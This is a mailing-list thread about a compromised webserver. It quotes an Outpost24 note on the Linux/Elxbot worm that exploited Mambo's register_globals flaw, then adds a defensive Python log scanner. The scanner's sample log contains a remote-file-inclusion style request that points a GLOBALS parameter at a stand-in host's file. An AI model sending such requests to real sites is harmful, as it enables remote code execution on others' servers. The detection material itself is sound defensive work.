On Thu, 2006-05-11 at 23:55 +0200, Filippo Biondi wrote:
> On Thu, 11/05/2006 at 20.54 +0200, Massimo Danieli wrote:
>
> > > 1) How the heck did he manage to make my webserver issue that request?
> > > And to execute the file once it had been downloaded.
> > > Is it perhaps due to the action of another script?
> >
> > Probably some software that allows code injection (a nice PHP forum
> > by any chance, or Mambo?)
>
> the second one you said
From: David Jacoby <security_at_outpost24.com>
Date: Mon, 05 Dec 2005 21:23:23 +0100
Outpost24 Public Security Note - http://www.outpost24.com
[BACKGROUND]
Mambo is a dynamic portal engine and content management system. The
software is written in PHP. A computer researcher who goes under the
alias rgod released an exploit for the "register_globals" Emulation
Layer Overwrite vulnerability, and just a few days after the
vulnerability was released, increased attacks for this vulnerability
were monitored; the increased traffic is due to a worm which is
currently in the wild.
[DESCRIPTION]
Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search
on Google for vulnerable targets. Once it infects a computer it will
connect to a predetermined IRC server where the attackers will wait and
have the possibility to gain access to the infected computer. The
attackers may also perform various tasks such as:
* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan
On certain systems it will also download a perl script which will
allow the attacker to create a backchannel and spawn a shell on the
infected computer with the same privileges as the running webserver.
A detailed profile is available for Outpost24 members; for more
information please visit our webpage at http://www.outpost24.com
[SOLUTION]
Download the latest version from the official Mambo homepage or
download the specific patch for this vulnerability.
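Massimo's question above (how the webserver was made to fetch and run a file) is answered by the note: a request abusing the register_globals emulation layer. As an added example that is not part of this thread or of Outpost24's note, the script below scans webserver access-log lines for the two traits such a request shows: a query-string key that tries to write into GLOBALS[...] (the overwrite the note refers to; the exact key name used by the exploit is assumed, not taken from the thread) and a parameter whose value is a remote URL, which is how the downloaded file reaches the host. The log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined-log style (not from the thread).
SAMPLE_LOG = """\
10.0.0.5 - - [11/May/2006:20:41:02 +0200] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.9 - - [11/May/2006:20:42:17 +0200] "GET /index.php?GLOBALS%5Bsome_path%5D=http://203.0.113.7/fetch.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
10.0.0.9 - - [11/May/2006:20:42:18 +0200] "POST /index.php HTTP/1.1" 200 210 "-" "libwww-perl/5.805"
"""

# Extracts method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (rule, key, value) triples for query parameters that either
    try to overwrite a GLOBALS[...] entry (assumed shape of the
    register_globals emulation overwrite) or carry a remote URL."""
    query = urlsplit(target).query
    findings = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        key_dec = unquote(key)  # parse_qsl already decodes; harmless second pass
        if key_dec.upper().startswith("GLOBALS["):
            findings.append(("globals_overwrite", key_dec, value))
        if re.match(r"(?i)^(https?|ftp)://", value):
            findings.append(("remote_url", key_dec, value))
    return findings


def scan_log(text):
    """Return (client_ip, target, findings) for every request that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group("target"))
        if findings:
            hits.append((line.split()[0], m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for rule, key, value in findings:
            print("   ", rule, key, "=", value)
```

A hit on both rules from the same client, followed shortly by a POST from the same address, is the sequence worth pulling the webserver process list and outbound IRC connections for.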